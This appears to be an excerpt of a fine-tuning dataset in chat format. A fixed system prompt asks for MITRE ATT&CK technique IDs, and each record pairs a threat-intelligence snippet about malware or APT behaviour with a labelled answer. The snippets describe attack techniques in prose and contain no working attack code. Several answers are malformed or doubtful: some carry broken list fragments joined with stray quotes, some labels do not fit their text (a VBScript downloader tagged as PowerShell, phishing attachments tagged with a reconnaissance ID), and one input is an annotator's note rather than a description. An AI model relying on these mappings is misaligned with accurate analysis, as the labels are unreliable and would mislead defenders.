- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The domain names differed but the script adheres to the same logic (including the logic function).” The DNSMessenger malware is an obfuscated and customized version of the popular DNS_TXT_PWNAGE.ps1 script available on GitHub and is also referred to by FireEye as POWERSOURCE"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kaspersky Lab detections for Blue, Black, and Green Lamberts have been triggered by a relatively small set of victims from around the world. While investigating one of these infections involving White Lambert (network-driven implant) and Blue Lambert (active implant), we found yet another family of tools that appear to be related. We called this new family ‘Pink Lambert’."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET uses \"scp\" to access the \"~/Library/Cookies/Cookies.binarycookies\" file."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OceanSalt can create a reverse shell on the infected endpoint using cmd.exe. OceanSalt has been executed via malicious macros."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This callback function will call a function named pressedKeyWithKeyCode, which is responsible for logging the keystrokes"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedGrace creates, encrypts, and stores a configuration file containing the C&C IPs and ports in a “<hex digits>.dat” file (e.g. C:\\ProgramData\\21851a60.dat”). The first 16 bytes of the file are an AES initialization vector (IV). The rest of the data is AES-encrypted in CBC mode"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 likely used COVID-19-themed malicious attachments against Chinese speaking targets."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Duqu can track key presses with a keylogger module."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can clear and remove event logs."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERTON is written in PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT40 strongly favors web shells for maintaining presence, especially publicly available tools"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Action RAT can identify AV products on an infected host using the following command: `cmd.exe WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates folders to store output from batch scripts prior to sending the information to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource. The payload is downloaded from the following location and saved to \"%PUBLIC%\\svchost32.exe"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS."
- },
- {
- "role": "assistant",
- "content": "T1111 - Multi-Factor Authentication Interception"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses AppleScript to create a login item for persistence."
- },
- {
- "role": "assistant",
- "content": "T1059.002 - Command and Scripting Interpreter: AppleScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has used HTTP, HTTPS, and WebDav in network communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox can encrypt data using AES prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The “upload” command downloads files from the CnC and saves them locally in “C:\\ProgramData“"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has lured victims to execute malware with spearphishing attachments containing macros to download either Emotet, Bokbot, TrickBot, or Bazar."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has stored collected information and discovered processes in a tmp file."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry then proceeds to encrypt files on the system, searching for the following file extensions, which are hard-coded in the binary"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sharpshooter's first-stage downloader resolved various Windows libraries and APIs, including LoadLibraryA(), GetProcAddress(), and CreateProcessA()."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note that the actor used the DLL name wercplsupporte.dll as an attempt to masquerade as the legitimate DLL name, which is wercplsupport.dll (T1036.005: Match Legitimate Name or Location). In addition, more masquerading was used to make malicious Scheduled Tasks blend in with legitimate ones (T1053.005: Scheduled Task"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses DNS TXT records for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After selecting a payload URL, the script will create copies of certutil and regsvr32 to the temp directory for later use"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dok proxies web traffic to potentially monitor and alter victim HTTP(S) traffic."
- },
- {
- "role": "assistant",
- "content": "T1557 - Adversary-in-the-Middle"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seasalt obfuscates configuration data."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool. Usage is: %s shareIp domain [USER INFORMATION||[USER NAME AND PASSWORD]] [/run:[COMMAND"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kerrdown can encrypt, encode, and compress multiple layers of shellcode."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Newer variants of BACKSPACE will encode C2 communications with a custom system."
- },
- {
- "role": "assistant",
- "content": "T1132.002 - Non-Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For C2 over HTTP, Helminth encodes data with base64 and sends it via the \"Cookie\" field of HTTP requests. For C2 over DNS, Helminth converts ASCII characters into their hexadecimal values and sends the data in cleartext."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has stopped SQL services to ensure it can encrypt any database."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used domain accounts to gain further access to victim systems."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by FireEye in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBSRAT can list running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "lists the running processes"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For that we can use a Python script, included in Appendix B – Python Scripts"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to decode this data, Comnie first decodes it using base64 with the following non-standard alphabet (note that it is simply the original alphabet in reverse): /+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA The resulting data is then parsed and decrypted using RC4"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the IP address and domain from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use the command-line utility cacls.exe to change file permissions."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1222 - File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While historically TA416 has delivered Zip files from cloud hosting providers containing a decoy file, legitimate PE file, a DLL loader, and a PlugX malware configuration DAT file, recent campaigns used a different tactic. Proofpoint researchers noted that the malicious Zip files delivered from DropBox now contain a rudimentary executable which is a dropper malware. This malware establishes persistence for a legitimate executable file used in DLL search order hijacking, as well as initiates the download of four components. These components are included below and resemble the components used in the past to install PlugX malware. Public research has previously documented TA416’s propensity for including PlugX Trident Loader components and decoy in the initial delivered Zip file. The method of installing PlugX via DLL Search Order hijacking that displays a PDF decoy remains constant"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used RC4 to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can discover and collect victim system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed."
- },
- {
- "role": "assistant",
- "content": "T1132.002 - Non-Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves can obtain information about the logged on user both locally and for Remote Desktop sessions."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "How about DPAPI with keys tied per user & system. Volume serial ID keying. See the APT41 talk #FireEyeSummit7:19 PM · Oct 30, 2019·Twitter for Android12 Retweets1 Quote Tweet35 LikesNick Carr@ItsReallyNick"
- },
- {
- "role": "assistant",
- "content": "T1480.001 - Environmental Keying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB"
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method', 'T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This group uses spear-phishing emails to deliver both malicious Word and PDF documents, and attempts to social engineer the victim into an infection rather than trying to exploit a software vulnerability"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa has the capability to create and modify file timestamps."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer can use supplied user credentials to execute processes and stop services."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "deleted the DLL dropper from the victim’s machine to cover their tracks."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Capable of stealing documents sent to the printer queue. Data gathered for victim recon includes the backup list for Apple mobile devices. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "COM and execution in same sentence"
- },
- {
- "role": "assistant",
- "content": "T1021.003 - Remote Services: Distributed Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Briba installs a service pointing to a malicious DLL dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Javascript backdoor added a local_update_check value under the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run to establish persistence. Additionally, a custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can measure the download speed on a targeted host."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point"
- },
- {
- "role": "assistant",
- "content": "T1609 - Kubernetes Exec Into Container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to overwrite operating system files with image files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy has conducted port scans on a host."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. MSGet typically downloads encoded binaries from hard-coded URLs. Source: Secureworks) - Screen Capture Tool— This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Source: Secureworks) - RarStar — This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR — This tool extracts tools for lateral movement and compresses data for exfiltration. Use malware to upload the large list of enumerated files to the C2 server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use \"netstat\" to enumerate current network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been observed being used to download and the Cobalt Strike Beacon payload onto victims."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilGrab has the capability to capture audio from a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUPERNOVA is a Web shell."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Threat Group-3390 tool can create a new service, naming it after the config information, to gain persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT can zip files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script writes files to the path % appdata %\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily."
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can identify the process that owns remote connections."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
